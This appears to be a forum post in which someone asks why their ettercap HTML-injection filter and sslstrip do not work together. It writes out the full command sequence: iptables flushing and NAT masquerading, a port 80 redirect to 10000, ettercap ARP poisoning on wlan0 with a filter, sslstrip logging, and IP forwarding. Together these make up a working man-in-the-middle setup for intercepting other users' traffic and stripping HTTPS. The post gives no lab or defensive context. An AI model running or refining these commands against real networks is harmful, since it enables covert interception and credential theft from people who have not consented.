Hi all,

Following the documentation I've gotten ettercap setup to run either with a filter, or with sslstrip, but have not been able to get both working concurrently. I believe this is due to how routing has to occur external to ettercap (kernel) when using sslstrip for the port redirection from 80 to 10000, so that ettercap is never actually getting access to modify the packet, but I'm not 100% sure. Here is latest methodology I've tried:

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
ettercap -T -q -F html.ef -i wlan0 -M ARP:remote,oneway /, / -m ettercap.log  -a /etc/etter.conf
sslstrip -p -l 10000 -w sslstrip.log
echo "1" > /proc/sys/net/ipv4/ip_forward
/etc/etter.conf is set to run as nobody, and I've tried enabling and disabling iptables there, (with and without kernel forwarding) but things fail with sslstrip not being able to send on traffic if I do that. Using the above, sslstrip works, but the filter does not.

Any ideas?